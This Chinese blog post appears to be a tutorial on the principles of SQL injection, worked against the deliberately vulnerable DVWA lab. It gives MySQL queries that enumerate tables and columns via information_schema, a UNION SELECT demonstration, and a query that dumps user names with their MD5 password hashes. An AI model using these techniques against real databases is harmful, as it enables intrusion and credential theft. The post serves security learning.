sql注入语句背后的原理 

#查询表名-去重查询
#TABLE_NAME
#users
#guestbook
SELECT DISTINCT 
  TABLE_NAME 
FROM
  COLUMNS 
WHERE TABLE_SCHEMA = 'dvwa' ;

#查询表名-分组
#group_concat(distinct TABLE_NAME)
#guestbook,users
SELECT
  GROUP_CONCAT(DISTINCT TABLE_NAME)
FROM
  COLUMNS 
WHERE TABLE_SCHEMA = 'dvwa' ;

#查询表名-分组+指定表名
#data :guestbook,users
#tb_name
#guestbook,users
SELECT 
  GROUP_CONCAT(DISTINCT TABLE_NAME) AS 'tb_name' 
FROM
  COLUMNS 
WHERE TABLE_SCHEMA = 'dvwa' ;

#查询字段名
#data: avatar,failed_login,first_name,last_login,last_name,password,user,user_id
#group_concat(distinct COLUMN_NAME)
#avatar,failed_login,first_name,last_login,last_name,password,user,user_id
SELECT 
  GROUP_CONCAT(DISTINCT COLUMN_NAME) 
FROM
  COLUMNS 
WHERE TABLE_SCHEMA = 'dvwa' 
  AND TABLE_NAME = 'users' ;


#查询users表中user字段和password字段的值
SELECT 
  USER,
  PASSWORD 
FROM
  dvwa.`users` ;

#group_concat(user,'-->',password)	100
#admin-->5f4dcc3b5aa765d61d8327deb882cf99,
#gordonb-->e99a18c428cb38d5f260853678922e03,
#1337-->8d3533d75ae2c3966d7e0d4fcc69216b,
#pablo-->0d107d09f5bbe40cade3de5c71e9e9b7,
#smithy-->5f4dcc3b5aa765d61d8327deb882cf99	100
SELECT 
  GROUP_CONCAT(USER, '-->', PASSWORD),
  100 
FROM
  dvwa.`users` ;

#sql语句要在指定的数据库中执行、生效
#

###############################################################################################

#实操:在dvwa中进行sql注入
#查询数据库版本、当前数据库名
SELECT VERSION() AS 'version',DATABASE() AS 'db_name';


#查询information_schema.columns表中的table_name字段的值
#即:借助information_schema.columns这张表来查询当前dvwa数据库下有几张表
SELECT 
  GROUP_CONCAT(DISTINCT TABLE_NAME),
  VERSION() 
FROM
  information_schema.COLUMNS 
WHERE columns.TABLE_SCHEMA = DATABASE() ;

#联合查询原理
#user_id	first_name	last_name	user	password	avatar	last_login	failed_login
#1		2		3		4	5		6	7		8
#8.0.12		2		8		7	6		5	4		3
SELECT 
  * 
FROM
  dvwa.`users` 
WHERE user_id = - 2 
UNION
SELECT 
  1,
  2,
  3,
  4,
  5,
  6,
  7,
  8 
UNION
SELECT 
  VERSION(),
  2,
  8,
  7,
  6,
  5,
  4,
  3 ;

#查询dvwa数据库中的users表中的字段并去重
#GROUP_CONCAT(DISTINCT COLUMN_NAME)
#avatar,failed_login,first_name,last_login,last_name,password,user,user_id
SELECT 
  GROUP_CONCAT(DISTINCT COLUMN_NAME) 
FROM
  information_schema.COLUMNS 
WHERE columns.TABLE_SCHEMA = 'dvwa' 
  AND columns.TABLE_NAME = 'users' ;

#获取dvwa数据库中users表中的user、password数据
#group_concat(user,'-->',password)	        100
#admin-->5f4dcc3b5aa765d61d8327deb882cf99,
#gordonb-->e99a18c428cb38d5f260853678922e03,
#1337-->8d3533d75ae2c3966d7e0d4fcc69216b,
#pablo-->0d107d09f5bbe40cade3de5c71e9e9b7,
#smithy-->5f4dcc3b5aa765d61d8327deb882cf99	100
SELECT 
  GROUP_CONCAT(USER, '-->', PASSWORD),
  100 
FROM
  dvwa.`users` ;

#完毕
posted @ 2021-03-15 18:17  codeace  阅读(38)  评论(0)    收藏  举报